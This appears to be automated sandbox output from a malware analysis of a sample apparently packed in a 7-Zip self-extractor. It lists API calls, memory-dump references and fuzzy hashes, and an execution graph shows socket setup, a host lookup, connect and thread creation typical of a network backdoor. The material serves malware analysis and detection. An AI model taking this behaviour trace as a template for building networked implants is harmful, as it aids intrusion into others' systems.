                                                                                            APIs
                                                                                            • GetTempPathW.KERNEL32(00000001,00000000,00000002,00000000,00406437,00000000,?,?,00404B63,?,7ZSfx%03x.cmd), ref: 00403FA8
                                                                                            • GetTempPathW.KERNEL32(00000001,00000000,00000001,?,?,00404B63,?,7ZSfx%03x.cmd), ref: 00403FC5
                                                                                            • wsprintfW.USER32 ref: 00403FFB
                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 00404016
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: PathTemp$AttributesFilewsprintf
                                                                                            • String ID:
                                                                                            • API String ID: 1746483863-0
                                                                                            • Opcode ID: 013dbc26b67ec8e4cb6dbc59edbfaa415160c5e99e9f4e95bea1135156e91aed
                                                                                            • Instruction ID: 4b01c17e8612d334da970e7aef70975a1f373095b445c13461924cc76c43a46f
                                                                                            • Opcode Fuzzy Hash: 013dbc26b67ec8e4cb6dbc59edbfaa415160c5e99e9f4e95bea1135156e91aed
                                                                                            • Instruction Fuzzy Hash: 1B113672100204BFCB01AF59CC85AADB7F8FF88755F50802EF905972E1DB78AA008B88
                                                                                            APIs
                                                                                            • CharUpperW.USER32(?,74DEE0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
                                                                                            • CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF
                                                                                            • CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401B03
                                                                                            • CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401B13
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: CharUpper
                                                                                            • String ID:
                                                                                            • API String ID: 9403516-0
                                                                                            • Opcode ID: 18230d7c19ca01b706053a4839b324d461c93759ef2237e6a4782e95e1545131
                                                                                            • Instruction ID: 0ba0c8867aa888139ba8faa8f8ff432121b60ad667f2455bf366b55ac651d143
                                                                                            • Opcode Fuzzy Hash: 18230d7c19ca01b706053a4839b324d461c93759ef2237e6a4782e95e1545131
                                                                                            • Instruction Fuzzy Hash: 02112E34A11269ABCF108F99C8446BAB7E8FF44356B504467F881E3290D77CDE51EB64
                                                                                            APIs
                                                                                              • Part of subcall function 0040690F: GetDlgItem.USER32(?,?), ref: 0040691B
                                                                                              • Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
                                                                                              • Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950
                                                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00407FED
                                                                                            • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000103), ref: 0040800D
                                                                                            • GetDlgItem.USER32(?,000004B7), ref: 00408020
                                                                                            • SetWindowLongW.USER32(00000000,000000FC,Function_00006F37), ref: 0040802E
                                                                                              • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
                                                                                              • Part of subcall function 00407D06: LoadIconW.USER32(00000000), ref: 00407D33
                                                                                              • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000032), ref: 00407D43
                                                                                              • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000031), ref: 00407D48
                                                                                              • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
                                                                                              • Part of subcall function 00407D06: LoadImageW.USER32(00000000), ref: 00407D54
                                                                                              • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
                                                                                              • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
                                                                                              • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E76
                                                                                              • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E92
                                                                                              • Part of subcall function 004072DD: GetDlgItem.USER32(?,000004B6), ref: 004072EA
                                                                                              • Part of subcall function 004072DD: SetFocus.USER32(00000000,?,?,004073B2,000004B6,?), ref: 004072F1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ItemWindow$System$HandleLoadMessageMetricsModuleSend$DirectoryFileFocusIconImageInfoLongShow
                                                                                            • String ID:
                                                                                            • API String ID: 2538916108-0
                                                                                            • Opcode ID: a74d79fd4605bc1a7757bdbc28ebf3a23631424810f8539fda01f9cd24d05c25
                                                                                            • Instruction ID: 9218ed989044434557cb474aaa53437228351995edfdd36a91d94446a14b3a18
                                                                                            • Opcode Fuzzy Hash: a74d79fd4605bc1a7757bdbc28ebf3a23631424810f8539fda01f9cd24d05c25
                                                                                            • Instruction Fuzzy Hash: 7D1186B1A402146BCB10BBB99D09F9EB7FDEB84B04F00446EB652E31C0D6B8DA008B54
                                                                                            APIs
                                                                                            • SystemParametersInfoW.USER32(00000029,000001F4,?,00000000), ref: 00406814
                                                                                            • GetSystemMetrics.USER32(00000031), ref: 0040683A
                                                                                            • CreateFontIndirectW.GDI32(?), ref: 00406849
                                                                                            • DeleteObject.GDI32(00000000), ref: 00406878
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: System$CreateDeleteFontIndirectInfoMetricsObjectParameters
                                                                                            • String ID:
                                                                                            • API String ID: 1900162674-0
                                                                                            • Opcode ID: 5f8418ac61918c0235adc1083e46979a63813a21cc36a9cb80778b220a455722
                                                                                            • Instruction ID: e152b01862f646c7a4819b14062263d5307cf72e2961abd6127bac75ebed32e6
                                                                                            • Opcode Fuzzy Hash: 5f8418ac61918c0235adc1083e46979a63813a21cc36a9cb80778b220a455722
                                                                                            • Instruction Fuzzy Hash: A9116376A00205AFDB10DF94DC88FEAB7B8EB08300F0180AAED06A7291DB74DE54CF54
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040749F
                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 004074B8
                                                                                            • SHGetPathFromIDListW.SHELL32(00000000,00000000), ref: 004074D4
                                                                                            • SHGetMalloc.SHELL32(00000000), ref: 004074FE
                                                                                              • Part of subcall function 004072DD: GetDlgItem.USER32(?,000004B6), ref: 004072EA
                                                                                              • Part of subcall function 004072DD: SetFocus.USER32(00000000,?,?,004073B2,000004B6,?), ref: 004072F1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: BrowseFocusFolderFromItemListMallocPathmemset
                                                                                            • String ID:
                                                                                            • API String ID: 1557639607-0
                                                                                            • Opcode ID: a8285b8de4733da597857d8c27af206edc1c0a360700d70dd9a7d2ed45ada19f
                                                                                            • Instruction ID: 30b51fec80d89fd3ac1614d0428bedaa433d1aa4d1a510c8e8bcd0531de43efe
                                                                                            • Opcode Fuzzy Hash: a8285b8de4733da597857d8c27af206edc1c0a360700d70dd9a7d2ed45ada19f
                                                                                            • Instruction Fuzzy Hash: 43112171A00114ABDB10EBA5DD48BDE77FCAB84715F1040A9E505E7280DB78EF05CB75
                                                                                            APIs
                                                                                            • ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,00000000), ref: 004027F8
                                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00402801
                                                                                              • Part of subcall function 0040112B: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 0040114B
                                                                                              • Part of subcall function 0040112B: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 00401171
                                                                                            • ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000001,00000001,00000000,?,00000000,00000000,00000000), ref: 00402819
                                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 00402839
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@$EnvironmentExpandStrings$??2@
                                                                                            • String ID:
                                                                                            • API String ID: 612612615-0
                                                                                            • Opcode ID: 1bf054f2ccdc3be335b048ff77a64ac4bdb67295ffe3aca3d2c9ccbf2cc91127
                                                                                            • Instruction ID: 71972da321696c7643696fa2d61077c4bfdb6251f9c85b9dd911fab2e4c9aeed
                                                                                            • Opcode Fuzzy Hash: 1bf054f2ccdc3be335b048ff77a64ac4bdb67295ffe3aca3d2c9ccbf2cc91127
                                                                                            • Instruction Fuzzy Hash: EF017976D00118BADB04AB55DD41DDEB7BCEF48714B10417BF901B31D1EB746A4086A8
                                                                                            APIs
                                                                                              • Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
                                                                                              • Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00413550,00413558), ref: 00403AFD
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00413550,00413558), ref: 00403B05
                                                                                            • SetWindowTextW.USER32(?,?), ref: 00403B12
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?), ref: 00403B1D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@TextWindow$Length
                                                                                            • String ID:
                                                                                            • API String ID: 2308334395-0
                                                                                            • Opcode ID: 8119ca7b33955cbac21e87e4fe12ba773d40effc5d925a3b7e480b00d6a2293b
                                                                                            • Instruction ID: 2cc122b1f520d7f8021a056a959bf32eecafdcf33a956e59961b1277582e5a57
                                                                                            • Opcode Fuzzy Hash: 8119ca7b33955cbac21e87e4fe12ba773d40effc5d925a3b7e480b00d6a2293b
                                                                                            • Instruction Fuzzy Hash: 2EF0FF32D0410DBACF01FBA5DD46CDE7B79EF04705B10406BF501720A1EA79AB559B98
                                                                                            APIs
                                                                                            • GetObjectW.GDI32(?,0000005C,?), ref: 00407045
                                                                                            • CreateFontIndirectW.GDI32(?), ref: 0040705B
                                                                                            • GetDlgItem.USER32(?,000004B5), ref: 0040706F
                                                                                            • SendMessageW.USER32(00000000,00000030,00000000,00000000), ref: 0040707B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFontIndirectItemMessageObjectSend
                                                                                            • String ID:
                                                                                            • API String ID: 2001801573-0
                                                                                            • Opcode ID: 78def116b4819d627590729c5baad135a5410a8d7e74f17ad4cec64f2c4de15c
                                                                                            • Instruction ID: 5c236ef126686a3da9008926c30106754acf3bfa0ff8e01310dffb34f405da6a
                                                                                            • Opcode Fuzzy Hash: 78def116b4819d627590729c5baad135a5410a8d7e74f17ad4cec64f2c4de15c
                                                                                            • Instruction Fuzzy Hash: 35F05475900704ABDB209BA4DC09F8B7BFCAB48B01F048139BD51E11D4D7B4E5018B19
                                                                                            APIs
                                                                                            • GetParent.USER32(?), ref: 00401BA8
                                                                                            • GetWindowRect.USER32(?,?), ref: 00401BC1
                                                                                            • ScreenToClient.USER32(00000000,?), ref: 00401BCF
                                                                                            • ScreenToClient.USER32(00000000,?), ref: 00401BD6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClientScreen$ParentRectWindow
                                                                                            • String ID:
                                                                                            • API String ID: 2099118873-0
                                                                                            • Opcode ID: ede60c7992125a9d10b8f8c06fbaeb3be6251aeef84f0c1b655461571a46cee2
                                                                                            • Instruction ID: 3a6f634f9500a9f0e676680e31990ed58166cb62974d534a535afb1fb6b8d00a
                                                                                            • Opcode Fuzzy Hash: ede60c7992125a9d10b8f8c06fbaeb3be6251aeef84f0c1b655461571a46cee2
                                                                                            • Instruction Fuzzy Hash: 09E04F722052116BCB10AFA5AC88C8BBF6DDFC5723700447AF941A2220D7709D109A61
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wtol
                                                                                            • String ID: GUIFlags$[G@
                                                                                            • API String ID: 2131799477-2126219683
                                                                                            • Opcode ID: f402b0c85aba1d66b07b6addbe7eda3b1a8910d5e18cf18c534464033b9959d4
                                                                                            • Instruction ID: b6302b9691b8fcfec91ee3c39af82f4337802e9cb3a6f407b943601295de961a
                                                                                            • Opcode Fuzzy Hash: f402b0c85aba1d66b07b6addbe7eda3b1a8910d5e18cf18c534464033b9959d4
                                                                                            • Instruction Fuzzy Hash: 6DF03C3611C1635AFB342E0994187B6AA9CEB05793FE4443BE9C3F12D0C37C8E82825D
                                                                                            APIs
                                                                                            • GetEnvironmentVariableW.KERNEL32(?O@,?,00000001,004177A0,00000000,00417794,?,?,00404F3F,?,?,?,?,?), ref: 00402F26
                                                                                            • GetEnvironmentVariableW.KERNEL32(?,00000000,?,00000001,00000002,?,?,00404F3F,?,?,?,?,?), ref: 00402F52
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: EnvironmentVariable
                                                                                            • String ID: ?O@
                                                                                            • API String ID: 1431749950-3511380453
                                                                                            • Opcode ID: 0f0cab1a5fe64df75075e876fd7e6a607817ca224d69030a73e0dc08c334b9f4
                                                                                            • Instruction ID: 315e17eccb05daff3adc91fa9074d23558c2207180d60d9b2b56ce26dbf77fcb
                                                                                            • Opcode Fuzzy Hash: 0f0cab1a5fe64df75075e876fd7e6a607817ca224d69030a73e0dc08c334b9f4
                                                                                            • Instruction Fuzzy Hash: 24F06272200118BFDB00AFA9DC458AEB7EDEF88764B51402BF904D72A1D7B4AD008B98

                                                                                            Execution Graph

                                                                                             Execution Coverage: 6.6%
                                                                                             Dynamic/Decrypted Code Coverage: 25.8%
                                                                                             Signature Coverage: 5.9%
                                                                                             Total number of Nodes: 2000
                                                                                             Total number of Limit Nodes: 48
                                                                                            execution_graph 70313 10003200 Sleep 70314 10020254 70313->70314 70315 100032e0 6 API calls 70316 10002d80 ResetEvent InterlockedExchange timeGetTime socket 70317 10002de8 70316->70317 70318 10002dfc lstrlenW WideCharToMultiByte 70316->70318 70370 10006815 70317->70370 70337 100067ff 70318->70337 70322 10002df6 70323 10002e59 ctype 70324 10002e60 htons connect 70323->70324 70325 10002e96 70323->70325 70324->70325 70326 10002eab setsockopt setsockopt setsockopt setsockopt 70324->70326 70327 10006815 __fltout2 5 API calls 70325->70327 70329 10002f52 InterlockedExchange 70326->70329 70330 10002f24 WSAIoctl 70326->70330 70328 10002ea5 70327->70328 70349 1000721b 70329->70349 70330->70329 70333 1000721b 748 API calls 70334 10002f91 70333->70334 70335 10006815 __fltout2 5 API calls 70334->70335 70336 10002fa6 70335->70336 70339 10006f17 70337->70339 70340 10002e22 lstrlenW WideCharToMultiByte gethostbyname 70339->70340 70345 10006f3d std::exception::exception 70339->70345 70378 10006e83 70339->70378 70395 10008550 DecodePointer 70339->70395 70340->70323 70342 10006f7b 70397 10006e24 66 API calls std::exception::operator= 70342->70397 70344 10006f85 70398 10007836 RaiseException 70344->70398 70345->70342 70396 100073e9 76 API calls __cinit 70345->70396 70348 10006f96 70350 1000722b 70349->70350 70351 1000723f 70349->70351 70434 1000710d 66 API calls __getptd_noexit 70350->70434 70407 10009754 TlsGetValue 70351->70407 70354 10007230 70435 10008702 11 API calls __wctomb_s_l 70354->70435 70359 100072a2 70436 10006e49 66 API calls 2 library calls 70359->70436 70363 100072a8 70365 10002f79 70363->70365 70437 10007133 66 API calls 3 library calls 70363->70437 70365->70333 70366 10007267 CreateThread 70366->70365 70369 1000729a GetLastError 70366->70369 70495 100071b6 70366->70495 70369->70359 70371 1000681d 70370->70371 70372 1000681f IsDebuggerPresent 70370->70372 70371->70322 70918 
1000b5e6 70372->70918 70375 1000794f SetUnhandledExceptionFilter UnhandledExceptionFilter 70376 10007974 GetCurrentProcess TerminateProcess 70375->70376 70377 1000796c __call_reportfault 70375->70377 70376->70322 70377->70376 70379 10006f00 70378->70379 70387 10006e91 70378->70387 70405 10008550 DecodePointer 70379->70405 70381 10006f06 70406 1000710d 66 API calls __getptd_noexit 70381->70406 70384 10006ebf RtlAllocateHeap 70384->70387 70394 10006ef8 70384->70394 70386 10006eec 70403 1000710d 66 API calls __getptd_noexit 70386->70403 70387->70384 70387->70386 70391 10006eea 70387->70391 70392 10006e9c 70387->70392 70402 10008550 DecodePointer 70387->70402 70404 1000710d 66 API calls __getptd_noexit 70391->70404 70392->70387 70399 10008508 66 API calls __NMSG_WRITE 70392->70399 70400 10008359 66 API calls 6 library calls 70392->70400 70401 10008098 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 70392->70401 70394->70339 70395->70339 70396->70342 70397->70344 70398->70348 70399->70392 70400->70392 70402->70387 70403->70391 70404->70394 70405->70381 70406->70394 70408 10007245 70407->70408 70409 10009769 DecodePointer TlsSetValue 70407->70409 70410 10009fe4 70408->70410 70409->70408 70412 10009fed 70410->70412 70413 10007251 70412->70413 70414 1000a00b Sleep 70412->70414 70438 1000e555 70412->70438 70413->70359 70416 1000990f 70413->70416 70415 1000a020 70414->70415 70415->70412 70415->70413 70449 10009896 GetLastError 70416->70449 70418 10009917 70420 1000725e 70418->70420 70463 10008315 66 API calls 3 library calls 70418->70463 70421 100097e2 70420->70421 70465 10009db0 70421->70465 70423 100097ee GetModuleHandleW 70466 1000c144 70423->70466 70425 1000982c InterlockedIncrement 70473 10009884 70425->70473 70428 1000c144 __lock 64 API calls 70429 1000984d 70428->70429 70476 1000de7f InterlockedIncrement 70429->70476 70431 1000986b 70488 1000988d 70431->70488 70433 10009878 __lseeki64 70433->70366 70434->70354 70435->70365 70436->70363 70437->70365 
70439 1000e561 70438->70439 70444 1000e57c 70438->70444 70440 1000e56d 70439->70440 70439->70444 70447 1000710d 66 API calls __getptd_noexit 70440->70447 70441 1000e58f RtlAllocateHeap 70441->70444 70443 1000e572 70443->70412 70444->70441 70446 1000e5b6 70444->70446 70448 10008550 DecodePointer 70444->70448 70446->70412 70447->70443 70448->70444 70450 10009754 ___set_flsgetvalue 3 API calls 70449->70450 70451 100098ad 70450->70451 70452 10009903 SetLastError 70451->70452 70453 10009fe4 __calloc_crt 62 API calls 70451->70453 70452->70418 70454 100098c1 70453->70454 70454->70452 70455 100098c9 DecodePointer 70454->70455 70456 100098de 70455->70456 70457 100098e2 70456->70457 70458 100098fa 70456->70458 70459 100097e2 __getptd_noexit 62 API calls 70457->70459 70464 10006e49 66 API calls 2 library calls 70458->70464 70461 100098ea GetCurrentThreadId 70459->70461 70461->70452 70462 10009900 70462->70452 70464->70462 70465->70423 70467 1000c159 70466->70467 70468 1000c16c EnterCriticalSection 70466->70468 70491 1000c082 66 API calls 9 library calls 70467->70491 70468->70425 70470 1000c15f 70470->70468 70492 10008315 66 API calls 3 library calls 70470->70492 70493 1000c06b LeaveCriticalSection 70473->70493 70475 10009846 70475->70428 70477 1000dea0 70476->70477 70478 1000de9d InterlockedIncrement 70476->70478 70479 1000deaa InterlockedIncrement 70477->70479 70480 1000dead 70477->70480 70478->70477 70479->70480 70481 1000deb7 InterlockedIncrement 70480->70481 70482 1000deba 70480->70482 70481->70482 70483 1000dec4 InterlockedIncrement 70482->70483 70485 1000dec7 70482->70485 70483->70485 70484 1000dee0 InterlockedIncrement 70484->70485 70485->70484 70486 1000defb InterlockedIncrement 70485->70486 70487 1000def0 InterlockedIncrement 70485->70487 70486->70431 70487->70485 70494 1000c06b LeaveCriticalSection 70488->70494 70490 10009894 70490->70433 70491->70470 70493->70475 70494->70490 70496 10009754 ___set_flsgetvalue 3 API calls 70495->70496 70497 100071c1 70496->70497 
